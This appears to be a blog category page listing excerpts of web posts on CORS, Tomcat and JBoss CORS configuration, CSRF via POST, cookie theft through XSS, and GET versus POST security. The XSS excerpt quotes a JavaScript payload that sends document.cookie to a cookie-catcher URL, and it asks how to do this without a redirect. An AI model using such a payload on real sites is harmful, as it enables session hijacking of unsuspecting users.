Category: Web

What is CORS and how is it used 0

What is CORS and how is it used

Let’s say we wanted to provide a service at http://orlandotemp.net/temp that responds to AJAX GET requests from the external site example.com with a JSON object containing the current temperature in Orlando, FL. All we need to do to enable this...

How to enable CORS in Tomcat and JBOSS 0

How to enable CORS in Tomcat and JBOSS

For jboss we can use a solution from thetransactioncompany: web.xml: maven: If you use apache Tomcat you can use built-in CorsFilter: web.xml: pom.xml:

How to make CSRF attack using POST request 0

How to make CSRF attack using POST request

Imagine if www.example.com processed fund transfers through a GET request that will include two parameters: the amount that is to be transferred and the identifier of the account to which the money will be...

How to steal user cookies using XSS attack 0

How to steal user cookies using XSS attack

We know that it is possible to steal the cookie by redirecting to “False” page etc like this document.location= “http://www.example.com/cookie_catcher.php?c=” + document.cookie But how to do without redirecting the user? If you have full...

GET vs POST request. Why POST is more secured? 0

GET vs POST request. Why POST is more secured?

The GET request is marginally less secure than the POST request. Neither offers true “security” by itself; using POST requests will not magically make your website secure against malicious attacks by a noticeable amount. However, using...